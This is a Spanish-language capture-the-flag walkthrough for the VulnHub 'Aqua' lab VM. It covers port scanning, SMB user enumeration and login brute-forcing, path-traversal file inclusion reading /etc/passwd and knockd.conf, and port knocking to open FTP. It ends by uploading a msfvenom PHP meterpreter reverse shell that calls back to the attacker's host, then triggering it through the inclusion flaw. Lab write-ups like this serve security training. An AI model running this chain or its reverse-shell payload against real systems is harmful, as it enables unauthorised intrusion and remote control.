https://www.vulnhub.com/entry/aqua-1,419/
IP víctima 192.168.1.98
root@kali:~/Aqua# nmap -sS -sV -O 192.168.1.98
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-19 11:38 CEST
Nmap scan report for salamancageek.com (192.168.1.98)
Host is up (0.00074s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
21/tcp filtered ftp
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
MAC Address: 08:00:27:BD:32:FA (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: LINUXLITE
En la página web
Si le decimos que sí
root@kali:~/Aqua# enum4linux -a 192.168.1.98
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Jul 19 11:56:10 2020
==========================
| Target Information |
==========================
Target ........... 192.168.1.98
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
====================================================
| Enumerating Workgroup/Domain on 192.168.1.98 |
====================================================
[+] Got domain/workgroup name: WORKGROUP
============================================
| Nbtstat Information for 192.168.1.98 |
============================================
Looking up status of 192.168.1.98
LINUXLITE <00> - B <ACTIVE> Workstation Service
LINUXLITE <03> - B <ACTIVE> Messenger Service
LINUXLITE <20> - B <ACTIVE> File Server Service
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
MAC Address = 00-00-00-00-00-00
=====================================
| Session Check on 192.168.1.98 |
=====================================
[+] Server 192.168.1.98 allows sessions using username '', password ''
===========================================
| Getting domain SID for 192.168.1.98 |
===========================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
======================================
| OS information on 192.168.1.98 |
======================================
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 192.168.1.98 from smbclient:
[+] Got OS info for 192.168.1.98 from srvinfo:
LINUXLITE Wk Sv PrQ Unx NT SNT Linux Lite Shares
platform_id : 500
os version : 6.1
server type : 0x809a03
=============================
| Users on 192.168.1.98 |
=============================
Use of uninitialized value $users in print at ./enum4linux.pl line 874.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 877.
Use of uninitialized value $users in print at ./enum4linux.pl line 888.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 890.
=========================================
| Share Enumeration on 192.168.1.98 |
=========================================
Sharename Type Comment
--------- ---- -------
liteshare Disk
IPC$ IPC IPC Service (Linux Lite Shares)
SMB1 disabled -- no workgroup available
[+] Attempting to map shares on 192.168.1.98
//192.168.1.98/liteshare Mapping: DENIED, Listing: N/A
//192.168.1.98/IPC$ [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
====================================================
| Password Policy Information for 192.168.1.98 |
====================================================
[E] Unexpected error from polenum:
Traceback (most recent call last):
File "/usr/bin/polenum", line 16, in <module>
from impacket.dcerpc.v5.rpcrt import DCERPC_v5
File "/usr/lib/python2.7/dist-packages/impacket/dcerpc/v5/rpcrt.py", line 28, in <module>
from impacket.krb5 import kerberosv5, gssapi
File "/usr/lib/python2.7/dist-packages/impacket/krb5/kerberosv5.py", line 23, in <module>
from pyasn1.type.univ import noValue
ImportError: cannot import name noValue
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 5
==============================
| Groups on 192.168.1.98 |
==============================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
=======================================================================
| Users on 192.168.1.98 via RID cycling (RIDS: 500-550,1000-1050) |
=======================================================================
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-2516775589-3608648501-3152225691
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\aqua (Local User)
S-1-22-1-1001 Unix User\megumin (Local User)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-500 *unknown*\*unknown* (8)
S-1-5-32-501 *unknown*\*unknown* (8)
S-1-5-32-502 *unknown*\*unknown* (8)
S-1-5-32-503 *unknown*\*unknown* (8)
S-1-5-32-504 *unknown*\*unknown* (8)
S-1-5-32-505 *unknown*\*unknown* (8)
S-1-5-32-506 *unknown*\*unknown* (8)
S-1-5-32-507 *unknown*\*unknown* (8)
S-1-5-32-508 *unknown*\*unknown* (8)
S-1-5-32-509 *unknown*\*unknown* (8)
S-1-5-32-510 *unknown*\*unknown* (8)
S-1-5-32-511 *unknown*\*unknown* (8)
S-1-5-32-512 *unknown*\*unknown* (8)
S-1-5-32-513 *unknown*\*unknown* (8)
S-1-5-32-514 *unknown*\*unknown* (8)
S-1-5-32-515 *unknown*\*unknown* (8)
S-1-5-32-516 *unknown*\*unknown* (8)
S-1-5-32-517 *unknown*\*unknown* (8)
S-1-5-32-518 *unknown*\*unknown* (8)
S-1-5-32-519 *unknown*\*unknown* (8)
S-1-5-32-520 *unknown*\*unknown* (8)
S-1-5-32-521 *unknown*\*unknown* (8)
S-1-5-32-522 *unknown*\*unknown* (8)
S-1-5-32-523 *unknown*\*unknown* (8)
S-1-5-32-524 *unknown*\*unknown* (8)
S-1-5-32-525 *unknown*\*unknown* (8)
S-1-5-32-526 *unknown*\*unknown* (8)
S-1-5-32-527 *unknown*\*unknown* (8)
S-1-5-32-528 *unknown*\*unknown* (8)
S-1-5-32-529 *unknown*\*unknown* (8)
S-1-5-32-530 *unknown*\*unknown* (8)
S-1-5-32-531 *unknown*\*unknown* (8)
S-1-5-32-532 *unknown*\*unknown* (8)
S-1-5-32-533 *unknown*\*unknown* (8)
S-1-5-32-534 *unknown*\*unknown* (8)
S-1-5-32-535 *unknown*\*unknown* (8)
S-1-5-32-536 *unknown*\*unknown* (8)
S-1-5-32-537 *unknown*\*unknown* (8)
S-1-5-32-538 *unknown*\*unknown* (8)
S-1-5-32-539 *unknown*\*unknown* (8)
S-1-5-32-540 *unknown*\*unknown* (8)
S-1-5-32-541 *unknown*\*unknown* (8)
S-1-5-32-542 *unknown*\*unknown* (8)
S-1-5-32-543 *unknown*\*unknown* (8)
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
S-1-5-32-1000 *unknown*\*unknown* (8)
S-1-5-32-1001 *unknown*\*unknown* (8)
S-1-5-32-1002 *unknown*\*unknown* (8)
S-1-5-32-1003 *unknown*\*unknown* (8)
S-1-5-32-1004 *unknown*\*unknown* (8)
S-1-5-32-1005 *unknown*\*unknown* (8)
S-1-5-32-1006 *unknown*\*unknown* (8)
S-1-5-32-1007 *unknown*\*unknown* (8)
S-1-5-32-1008 *unknown*\*unknown* (8)
S-1-5-32-1009 *unknown*\*unknown* (8)
S-1-5-32-1010 *unknown*\*unknown* (8)
S-1-5-32-1011 *unknown*\*unknown* (8)
S-1-5-32-1012 *unknown*\*unknown* (8)
S-1-5-32-1013 *unknown*\*unknown* (8)
S-1-5-32-1014 *unknown*\*unknown* (8)
S-1-5-32-1015 *unknown*\*unknown* (8)
S-1-5-32-1016 *unknown*\*unknown* (8)
S-1-5-32-1017 *unknown*\*unknown* (8)
S-1-5-32-1018 *unknown*\*unknown* (8)
S-1-5-32-1019 *unknown*\*unknown* (8)
S-1-5-32-1020 *unknown*\*unknown* (8)
S-1-5-32-1021 *unknown*\*unknown* (8)
S-1-5-32-1022 *unknown*\*unknown* (8)
S-1-5-32-1023 *unknown*\*unknown* (8)
S-1-5-32-1024 *unknown*\*unknown* (8)
S-1-5-32-1025 *unknown*\*unknown* (8)
S-1-5-32-1026 *unknown*\*unknown* (8)
S-1-5-32-1027 *unknown*\*unknown* (8)
S-1-5-32-1028 *unknown*\*unknown* (8)
S-1-5-32-1029 *unknown*\*unknown* (8)
S-1-5-32-1030 *unknown*\*unknown* (8)
S-1-5-32-1031 *unknown*\*unknown* (8)
S-1-5-32-1032 *unknown*\*unknown* (8)
S-1-5-32-1033 *unknown*\*unknown* (8)
S-1-5-32-1034 *unknown*\*unknown* (8)
S-1-5-32-1035 *unknown*\*unknown* (8)
S-1-5-32-1036 *unknown*\*unknown* (8)
S-1-5-32-1037 *unknown*\*unknown* (8)
S-1-5-32-1038 *unknown*\*unknown* (8)
S-1-5-32-1039 *unknown*\*unknown* (8)
S-1-5-32-1040 *unknown*\*unknown* (8)
S-1-5-32-1041 *unknown*\*unknown* (8)
S-1-5-32-1042 *unknown*\*unknown* (8)
S-1-5-32-1043 *unknown*\*unknown* (8)
S-1-5-32-1044 *unknown*\*unknown* (8)
S-1-5-32-1045 *unknown*\*unknown* (8)
S-1-5-32-1046 *unknown*\*unknown* (8)
S-1-5-32-1047 *unknown*\*unknown* (8)
S-1-5-32-1048 *unknown*\*unknown* (8)
S-1-5-32-1049 *unknown*\*unknown* (8)
S-1-5-32-1050 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-5-21-2516775589-3608648501-3152225691 and logon username '', password ''
S-1-5-21-2516775589-3608648501-3152225691-500 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-501 LINUXLITE\nobody (Local User)
S-1-5-21-2516775589-3608648501-3152225691-502 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-503 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-504 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-505 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-506 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-507 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-508 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-509 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-510 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-511 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-512 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-513 LINUXLITE\None (Domain Group)
S-1-5-21-2516775589-3608648501-3152225691-514 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-515 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-516 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-517 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-518 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-519 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-520 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-521 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-522 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-523 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-524 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-525 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-526 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-527 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-528 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-529 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-530 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-531 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-532 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-533 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-534 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-535 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-536 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-537 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-538 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-539 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-540 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-541 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-542 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-543 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-544 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-545 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-546 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-547 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-548 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-549 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-550 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-1000 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-1001 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-1002 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-1003 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-1004 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-1005 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-1006 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-1007 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-1008 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-1009 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-1010 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-1011 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-1012 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-1013 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-1014 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-1015 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-1016 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-1017 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-1018 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-1019 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-1020 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-1021 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-1022 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-1023 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-1024 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-1025 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-1026 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-1027 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-1028 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-1029 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-1030 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-1031 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-1032 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-1033 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-1034 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-1035 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-1036 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-1037 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-1038 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-1039 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-1040 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-1041 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-1042 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-1043 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-1044 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-1045 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-1046 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-1047 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-1048 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-1049 *unknown*\*unknown* (8)
S-1-5-21-2516775589-3608648501-3152225691-1050 *unknown*\*unknown* (8)
=============================================
| Getting printer info for 192.168.1.98 |
=============================================
No printers returned.
enum4linux complete on Sun Jul 19 11:56:47 2020
Tenemos los usuarios
aqua y megumin
podemos descubrir usando el módulo scanner/smb/smb_login de metasploit que un usuario es megumin:admin y el otro aqua:admin
[*] 192.168.1.98:445 - 192.168.1.98:445 - Starting SMB login bruteforce
[+] 192.168.1.98:445 - 192.168.1.98:445 - Success: '.\aqua:admin'
[!] 192.168.1.98:445 - No active DB -- Credential data will not be saved!
[+] 192.168.1.98:445 - 192.168.1.98:445 - Success: '.\megumin:admin'
[*] 192.168.1.98:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
root@kali:~/Aqua# nikto -host 192.168.1.98
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.1.98
+ Target Hostname: 192.168.1.98
+ Target Port: 80
+ Start Time: 2020-07-25 13:28:21 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.1.1".
+ Cookie PHPSESSID created without the httponly flag
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ 7916 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time: 2020-07-25 13:29:19 (GMT2) (58 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Si nos logueamos con las credenciales que nos decía en yes.html
megumin:watashiwamegumin
http://192.168.1.98/home.php?showcase=/../../../../../etc/hosts
Nos sale
127.0.0.1 localhost
127.0.1.1 aqua
# The following lines are desirable for IPv6 capable hosts
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
http://192.168.1.98/home.php?showcase=/../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:117:Light Display Manager:/var/lib/lightdm:/bin/false
ntp:x:109:119::/home/ntp:/bin/false
avahi:x:110:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
colord:x:111:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
hplip:x:113:7:HPLIP system user,,,:/var/run/hplip:/bin/false
nm-openconnect:x:114:124:NetworkManager OpenConnect plugin,,,:/var/lib/NetworkManager:/bin/false
nm-openvpn:x:115:125:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/bin/false
pulse:x:116:126:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:117:128:RealtimeKit,,,:/proc:/bin/false
saned:x:118:129::/var/lib/saned:/bin/false
usbmux:x:119:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
aqua:x:1000:1000:aqua,,,:/home/aqua:/bin/bash
mysql:x:120:131:MySQL Server,,,:/nonexistent:/bin/false
ftp:x:121:132:ftp daemon,,,:/srv/ftp:/bin/false
megumin:x:1001:1001:,,,:/var/www/html/deployment:/bin/bash
http://192.168.1.98/home.php?showcase=/../../../../../etc/default/openvpn
# This is the configuration file for /etc/init.d/openvpn
#
# Start only these VPNs automatically via init script.
# Allowed values are "all", "none" or space separated list of
# names of the VPNs. If empty, "all" is assumed.
# The VPN name refers to the VPN configutation file name.
# i.e. "home" would be /etc/openvpn/home.conf
#
# If you're running systemd, changing this variable will
# require running "systemctl daemon-reload" followed by
# a restart of the openvpn service (if you removed entries
# you may have to stop those manually)
#
#AUTOSTART="all"
#AUTOSTART="none"
#AUTOSTART="home office"
#
# WARNING: If you're running systemd the rest of the
# options in this file are ignored.
#
# Refresh interval (in seconds) of default status files
# located in /var/run/openvpn.$NAME.status
# Defaults to 10, 0 disables status file generation
#
#STATUSREFRESH=10
#STATUSREFRESH=0
# Optional arguments to openvpn's command line
OPTARGS=""
#
# If you need openvpn running after sendsigs, i.e.
# to let umountnfs work over the vpn, set OMIT_SENDSIGS
# to 1 and include umountnfs as Required-Stop: in openvpn's
# init.d script (remember to run insserv after that)
#
OMIT_SENDSIGS=0
Recordemos que teníamos
PORT STATE SERVICE VERSION
21/tcp filtered ftp
por tanto, hay un cortafuegos (seguramente iptables) que está protegiendo el servidor ftp.
Bien, hay un mecanismo de seguridad, el golpeo de puertos (port knocking) que trata de, cuando un servicio está detrás de un firewall, protegiéndolo, pero queremos acceder a él extermanente (como administradores) cuando sea necesario, tocamos una secuencia ordenada y concreta de puertos, y entonces, iptables nos mostrará el acceso.
Para ello, seguramente tenga instalada knock (apt-get install knockd), cuyo archivo de configuración está en /etc/knockd.conf
Probemos
http://192.168.1.98/home.php?showcase=/../../../../../etc/knockd.conf
[options]
UseSysLog
Interface=enp0s3
[FTP]
sequence = 1234:tcp,5678:tcp,9012:tcp
seq_timeout = 15
tcpflags = syn
command = iptables -I INPUT 1 -s %IP% -p tcp -m tcp --dport 21 -j ACCEPT
Pues sí, y además, concretamente, tenemos que golpear los puertos por el siguiente orden: 1234, 5678, 9012.
root@kali:~/Aqua# knock 192.168.1.98 1234 5678 9012 -v
hitting tcp 192.168.1.98:1234
hitting tcp 192.168.1.98:5678
hitting tcp 192.168.1.98:9012
Vale, ya está golpeados, veamos de nuevo.
root@kali:~/Aqua# nmap 192.168.1.98
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-01 18:36 CEST
Nmap scan report for salamancageek.com (192.168.1.98)
Host is up (0.0012s latency).
Not shown: 996 closed ports
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 08:00:27:BD:32:FA (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 0.34 seconds
Ya está abierto
Veamos el servidor ftp
root@kali:~/Aqua# ftp
ftp> o
(to) 192.168.1.98
Connected to 192.168.1.98.
220 (vsFTPd 3.0.3)
Name (192.168.1.98:root): megumin
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 33 33 107 Jan 16 2020 hello.php
-rw-r--r-- 1 33 33 93 Jan 16 2020 notes
drwxr-xrwx 2 1001 1001 4096 Jan 14 2020 production
226 Directory send OK.
ftp> download hello.php
?Invalid command
ftp> get hello.php
local: hello.php remote: hello.php
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for hello.php (107 bytes).
226 Transfer complete.
107 bytes received in 0.00 secs (188.9551 kB/s)
ftp> get notes
local: notes remote: notes
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for notes (93 bytes).
226 Transfer complete.
93 bytes received in 0.04 secs (2.3851 kB/s)
ftp> cd production
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-rw-r-- 1 1001 1001 52 Jan 14 2020 meow.txt
226 Directory send OK.
ftp> get meow
local: meow remote: meow
200 PORT command successful. Consider using PASV.
550 Failed to open file.
ftp> get meow.txt
local: meow.txt remote: meow.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for meow.txt (52 bytes).
226 Transfer complete.
52 bytes received in 0.00 secs (43.9284 kB/s)
ftp>
Ya me he descargado todo.
root@kali:~/Aqua# cat notes
Please do not delete the /var/www/html/deployment/production/ directory - Megumin the hacker
root@kali:~/Aqua# cat hello.php
<html>
<h1 style="text-align:center;color:white;"> Welcome to my secret lair! Muahahaha... </h1>
</html>
Creamos una shell
root@kali:~/Aqua# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.57 LPORT=7777 -f raw > shell.php
Acordaros de borrar el comentario y añadir al final ?> en shell.php
Ahora, nos volvemos a conectar a ftp y lo subimos
root@kali:~/Aqua# ftp 192.168.1.98
Connected to 192.168.1.98.
220 (vsFTPd 3.0.3)
Name (192.168.1.98:root): megumin
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 33 33 107 Jan 16 2020 hello.php
-rw-r--r-- 1 33 33 93 Jan 16 2020 notes
drwxr-xrwx 2 1001 1001 4096 Jan 14 2020 production
226 Directory send OK.
ftp> cd production
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-rw-r-- 1 1001 1001 52 Jan 14 2020 meow.txt
226 Directory send OK.
ftp> put shell.php
local: shell.php remote: shell.php
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
1113 bytes sent in 0.00 secs (13.2680 MB/s)
ftp>
abrimos msfconsole
msf5 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set PAYLOAD php/meterpreter/reverse/tcp
set [-] The value specified for PAYLOAD is not valid.
msf5 exploit(multi/handler) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf5 exploit(multi/handler) > set LPORT 7777
LPORT => 7777
msf5 exploit(multi/handler) > set ExitOnSession false
ExitOnSession => false
msf5 exploit(multi/handler) > exploit -j -z
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 0.0.0.0:7777
Usamos LFI para ejecutar la shell
192.168.1.98/home.php?showcase=../deployment/production/shell.php
msf5 exploit(multi/handler) > [*] Sending stage (38288 bytes) to 192.168.1.98
